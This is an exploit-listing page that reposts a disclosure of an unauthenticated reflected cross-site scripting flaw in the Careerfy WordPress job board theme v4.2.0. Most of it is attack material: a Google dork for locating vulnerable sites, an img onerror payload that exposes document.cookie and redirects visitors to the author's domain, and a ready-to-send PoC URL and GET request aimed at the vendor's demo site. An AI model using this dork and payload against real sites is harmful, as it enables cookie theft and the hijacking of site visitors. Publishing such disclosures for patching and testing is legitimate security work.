Careerfy - Job Board WordPress Theme v4.2.0 - Unauthenticated Reflected XSS
CVE
Category
Price
Severity
CVE-2021-24787
CWE-79
$1,000 - $5,000
Medium
Author
Risk
Exploitation Type
Date
dawgyg
High
Remote
2020-07-21
CPE
cpe:cpe:/a:careerfy:job_board_wordpress_theme:4.2.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070110 Below is a copy:
Careerfy - Job Board WordPress Theme v4.2.0 - Unauthenticated Reflected XSS [+] Exploit Title: Careerfy - Job Board WordPress Theme v4.2.0 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-15
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 4.2.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79
### [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Careerfy Job Board theme v4.2.0 for WordPress.
### [ Payload: ]
[$] <img src=x onerror=alert(`VLDVCTOR`);alert(document.cookie);window.location=`https://vladvector.ru`;>
### [ PoC: ]
[!] https://careerfy.net/careerbooster/jobs-listing/?job_type=%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://vladvector.ru`;%3E
[!] GET /careerbooster/jobs-listing/?job_type=%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://vladvector.ru`;%3E HTTP/1.1
Host: careerfy.net
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum